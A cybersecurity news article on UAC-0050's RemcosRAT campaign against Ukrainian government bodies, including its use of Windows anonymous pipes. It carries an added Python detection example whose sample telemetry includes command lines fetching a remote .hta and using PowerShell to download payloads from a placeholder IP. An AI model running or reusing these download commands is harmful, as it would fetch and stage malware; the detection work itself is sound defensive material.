Threat Group Using Rare Data Transfer Tactic in New RemcosRAT Campaign

A threat actor known for repeatedly targeting organizations in Ukraine with the RemcosRAT remote surveillance and control tool is back at it again, this time with a new tactic for transferring data without triggering endpoint detection and response systems.
The adversary, tracked as UAC-0050, is focused on Ukrainian government entities in its latest campaign.
Researchers at Uptycs who spotted it said the attacks may be politically motivated, with the goal of collecting specific intelligence from Ukrainian government agencies.
The RemcosRAT Threat

Threat actors have been using RemcosRAT - which started life as a legitimate remote administration tool - to control compromised systems since at least 2016.
Among other things, the tool allows attackers to gather and exfiltrate system, user, and processor information.
It can bypass many antivirus and endpoint threat detection tools and execute a variety of backdoor commands.
In many instances threat actors have distributed the malware in attachments in phishing emails.
Uptycs has not been able to determine the initial attack vector in the latest campaign just yet but said it is leaning toward job-themed phishing and spam emails as most likely being the malware distribution method.
The security vendor based its assessment on emails it reviewed that purported to offer the targeted Ukrainian military personnel consultancy roles with the Israel Defense Forces.
The infection chain itself begins with a .lnk file that gathers information about the compromised system and then retrieves an HTML application named 6.hta from an attacker-controlled remote server using a Windows native binary, Uptycs said.
The retrieved app contains a PowerShell script that initiates steps to download two other payload files from an attacker-controlled domain and - ultimately - to install RemcosRAT on the system.
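The chain above (native binary pulls a remote .hta, which launches PowerShell to download further payloads) shows up as a parent/child relationship in process-creation telemetry. The detection logic below is an added example, not code from Uptycs or the article; the events are constructed, the IP is a documentation address, and the image name lolbin.exe is a placeholder because the article does not name the native binary.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# A command line that fetches an .hta over HTTP(S); the binary doing the
# fetch is deliberately not matched, since the article leaves it unnamed.
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


def find_hta_to_powershell_chains(events):
    """Return (hta_fetch_pid, powershell_pid) pairs where a process that pulled a
    remote .hta spawned a powershell.exe child that itself reaches out to a URL,
    i.e. the second-stage download step described in the article."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.image.lower() != "powershell.exe" or not REMOTE_URL.search(e.cmdline):
            continue
        parent = by_pid.get(e.ppid)
        if parent is not None and REMOTE_HTA.search(parent.cmdline):
            hits.append((parent.pid, e.pid))
    return hits


# Constructed sample telemetry (hypothetical): one malicious chain, two benign PowerShell launches.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "cmd.exe", 'cmd.exe /c "C:\\Users\\user\\Downloads\\consultancy_offer.lnk"'),
    ProcEvent(300, 200, "lolbin.exe", "lolbin.exe http://192.0.2.10/6.hta"),  # placeholder native binary
    ProcEvent(400, 300, "powershell.exe",
              'powershell.exe -NoProfile -Command "iwr http://192.0.2.10/p1.bin -OutFile p1.bin; '
              'iwr http://192.0.2.10/p2.bin -OutFile p2.bin"'),
    ProcEvent(500, 100, "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
    ProcEvent(600, 100, "powershell.exe", "powershell.exe -Command Invoke-WebRequest https://intranet.example/health"),
]

if __name__ == "__main__":
    print(find_hta_to_powershell_chains(SAMPLE_EVENTS))  # [(300, 400)]
```

Only the PowerShell instance whose parent fetched the remote .hta is flagged; the locally scripted and intranet-bound launches are not.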
A Somewhat Rare Tactic

What makes UAC-0050's new campaign different is the threat actor's use of a Windows interprocess communication feature called anonymous pipes to transfer data on compromised systems.
As Microsoft describes it, an anonymous pipe is a one-way communications channel for transferring data between a parent and a child process.
UAC-0050 is taking advantage of the feature to covertly channel data without triggering any EDR or antivirus alerts, Uptycs researchers Kathiresan and Trivedi said.
UAC-0050 is not the first threat actor to use pipes to exfiltrate stolen data, but the tactic remains relatively rare, the Uptycs researchers noted.
This is far from the first time that security researchers have spotted UAC-0050 attempting to distribute RemcosRAT to targets in Ukraine.
On multiple occasions last year, Ukraine's Computer Emergency Response Team warned of campaigns by the threat actor to distribute the remote access Trojan to organizations in the country.
The most recent was an advisory on Dec. 21, 2023, about a mass phishing campaign involving emails with an attachment that purported to be a contract involving Kyivstar, one of Ukraine's largest telecommunications providers.
The emails contained an attachment in the form of an archive file or RAR file.
CERT-UA issued similar alerts on three other occasions last year, one in November with court subpoena-themed emails serving as the initial delivery vehicle; another, also in November, with emails allegedly from Ukraine's security service; and the first in February 2023 about a mass email campaign with attachments that appeared to be associated with a district court in Kyiv.


This Cyber News was published on www.darkreading.com. Publication date: Fri, 05 Jan 2024 01:30:15 +0000